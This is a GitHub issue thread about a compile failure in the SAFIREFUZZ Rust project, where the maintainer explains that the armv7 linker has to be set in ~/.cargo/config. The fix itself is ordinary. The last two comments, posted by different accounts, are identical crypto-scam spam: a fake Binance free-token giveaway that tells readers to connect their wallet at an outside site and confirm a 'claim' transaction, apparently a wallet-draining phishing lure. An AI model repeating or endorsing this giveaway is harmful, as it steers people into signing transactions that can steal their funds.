### ISSUE TITLE
Unable to compile

### ISSUE THREAD

**Issue by zhjygit** [pr0me/SAFIREFUZZ#1]
If you use nightly-2022-05-04 mode, an error is reported when cargo builds:

     cargo build --release --target armv7-unknown-linux-gnueabihf

     **Compiling safirefuzz v0.1.0 (/home/iot/SAFIREFUZZ)
 note: "cc" "/tmp/rustcWVGYjq/symbols.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.14lvkzgw832a5u3c.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.14yfzkgugbkfdk9i.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1aisgvvbxtbejle4.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1c6eo5k0yg9bhwsa.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1cmo1bay0m436yib.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1dvcybsqrvk5ot48.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1ed3i958jmmilmri.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1ix1duffrms6yz3d.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1iyx7b1pgupzbuue.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1j5ongwdmtfnh49b.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1jwmw7z032jxak68.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1k6ra5yc85jkcadx.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1lxhr55nul4unxv7.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1mgayut5rx0240e9.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.1nuowrfl0janwmi2.rcgu.o" "/home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac5
。。。。。。。。
。。。。。。。。
= note: /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /usr/bin/ld: /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: Relocations in generic ELF (EM: 40)
          /home/iot/SAFIREFUZZ/target/armv7-unknown-linux-gnueabihf/release/deps/safirefuzz-5e1ac58641016471.127xm0b7tjbj6enm.rcgu.o: error adding symbols: File in wrong format
          collect2: error: ld returned 1 exit status**

If you do not use nightly-2022-05-04 mode, the cargo build prompts unstable lab versions such as feature, start, naked, etc., and the final compilation cannot be completed by deleting the feature attribute.

**Comment by pr0me** [comment]
Hi, the error sounds like cargo is not pointed at the correct linker.

As per the README, try putting the following in your cargo config file (`~/.cargo/config`):
```
[target.armv7-unknown-linux-gnueabihf]
linker = "arm-linux-gnueabihf-gcc"
```

**Comment by zhjygit** [comment]
> Hi, the error sounds like you did not point cargo to the correct linker.
> 
> As per the README, you have to put the following in your cargo config file (`~/.cargo/config`):
> 
> ```
> [target.armv7-unknown-linux-gnueabihf]
> linker = "arm-linux-gnueabihf-gcc"

In fact, I save "[target.armv7-unknown-linux-gnueabihf] linker = "arm-linux-gnueabihf-gcc"" in the Cargo.cfg file.

**Comment by pr0me** [comment]
Please make sure that you put it in a file called just `config` (without .cfg) in the `.cargo` directory inside your home directory.

**Comment by zhjygit** [comment]
> 

ok，I will try it.
Thanks.

**Comment by zhjygit** [comment]
> Please make sure that you put it in a file called just `config` (without .cfg) in the `.cargo` directory inside your home directory.

It is ok, thanks sir.

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
